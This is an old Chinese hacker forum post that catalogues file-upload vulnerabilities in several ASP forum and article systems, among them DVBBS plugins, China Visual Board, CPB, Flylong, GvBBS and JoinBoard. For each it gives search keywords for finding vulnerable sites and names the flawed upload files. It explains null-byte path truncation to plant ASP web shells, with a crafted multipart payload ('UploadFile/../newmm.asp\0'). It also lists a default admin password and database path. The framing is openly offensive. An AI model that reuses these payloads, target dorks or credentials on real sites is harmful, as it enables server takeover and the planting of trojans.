|
论坛漏洞集 樱木花盗 发表于 2006-7-28 5:21:12 |
版权所有: AspSky.Net bbs后面+upfile.asp 传木马系统
版本【DVBBSSP2:】 星空驿站插件版目前所有 关键字: "Design By∶XingKong V2.2" 漏洞描述: NF_visual_upfile.asp?
【China Visual Board】 1、漏洞文件 SaveArticle_UpFile.asp 2、关键字 "China Visual Board" 目前所有版本 3、漏洞描述 变量file1、filepath,属性是hidden的 由于这两个变量滤处理不严 用\0大家或者老兵的变量利用工具测试 4、想多了点.... 最大的问题在于他们的上传文件名和路径这两个变量 而upfile变量的使用又千篇一律不知道是不是抄袭的。。~!~ 目前说来,只要你得到到了论坛upfile的这两个参数名字加上cookies 随便伪造个数据包,基本可以拿下..
上传漏洞再再现——CPBv1.3
【ChinaPowerBoard bbs】CPBv1.3
1、漏洞文件 upload.asp
2、关键字 "Powered by China Power Board v1.3" 针对1.3全部、2.0beta部分 奇怪的是最新版本2.0和最低版本1.0不存在这个问题!
3、漏洞描述 注意form中的变量: <form method="post" action="upload.asp" enctype="multipart/form-data" name="form2" class=tdc > <input type=file name="file1" size="40" class=bdtj> <input type="hidden" name="uploadtypefy" value="uploadface/"> <input type="submit" name="submit" value="上 传" class=bdtj> </form> -------------上面这里写错了,多亏暝暝及时提醒,,,希望没有耽误大家用 由于这两个变量滤处理不严,我们在cookies中file1和uploadtypefy 大家可以下CPB论坛,看看upload.asp中对变量处理的部分
飞龙文章系统上传漏洞[0923]
1、关键字 "Copyright Flylong.Net"
2、漏洞文件 /news/user_upfile.asp
3、漏洞描述 <form action="user_upfile.asp" ...> <input type="hidden" name="filepath" value="UploadFile"> <input type="file" name="file"> <input type="submit" name="Submit" value="上传" class="login_btn"> </form> 又是一个变量过滤不严格... 估计作者对filepath根本就没有任何处理 路径变量: filepath 文件上传: UploadFile/****.gif(或其他) 数据格式: -----------------------------7d41e678e012a Content-Disposition: form-data; name="filepath" ===>数据包格式 UploadFile ===>关键所在 看到没?只要我们只要将数据的关键filepath处理成 "UploadFile"+"要改的路径"+"文件名"+"结束标志--\0或者00H" 例如: -----------------------------7d41e678e012a Content-Disposition: form-data; name="filepath" UploadFile/../newmm.asp\0 就可以实现将你的木马上传至uploadfile的上级目录,文件名为newmm.asp
4、测试工具 NC+WSE或者老兵的变量利用工具
GvBBS严重上传漏洞[0923]
今晚在线论坛上传漏洞
1、关键字 "GVBBS Version 5.0"
2、漏洞文件 /upFile/upfile.asp
3、漏洞描述 上传路径变量未过滤,GvBBS中为filepath 精心构造数据包,提交filepath为 "路径"+"文件名.asp"+"结束标志(\0或者00h)" form表(给写GvBBS漏洞利用工具的提供个参考): <form *** action="upfile.asp" ***> <input type="hidden" name="filepath" value=""> <input type="hidden" name="lsID" value=""> <input type="hidden" name="act" value="upload"> <input type="file" name="file1"> <input type="submit" name="Submit" value="上传" onclick="clkBun();">
4、测试工具 NC+WSE 由于作者在upfile中设置了若干hiden属性的变量 用老兵的工具提交时候会因为变量丢失而失败.. 对Gvbbs目前所有版本有效!
DvSP2云林全插件美化版漏洞[20040924] 1、关键字 "Copyright xdong.Net" 2、漏洞文件 z_visual_upfile.asp down_upfile.asp
3、漏洞描述 关于这个论坛我只能说作者及不负责任! 两个插件分别来自两个论坛。。。 插件本来就又问题他又不处理 都是上传路径变量的过滤不严
Powered by: JoinBoard V2.3 版本! 默认用户admin和密码jbadmin 数据库 bbs/db/joinboard.mdb
Powered by: JoinBoard V2.0 版本! 上传缺少空格过滤功能 |
|
发表评论:
|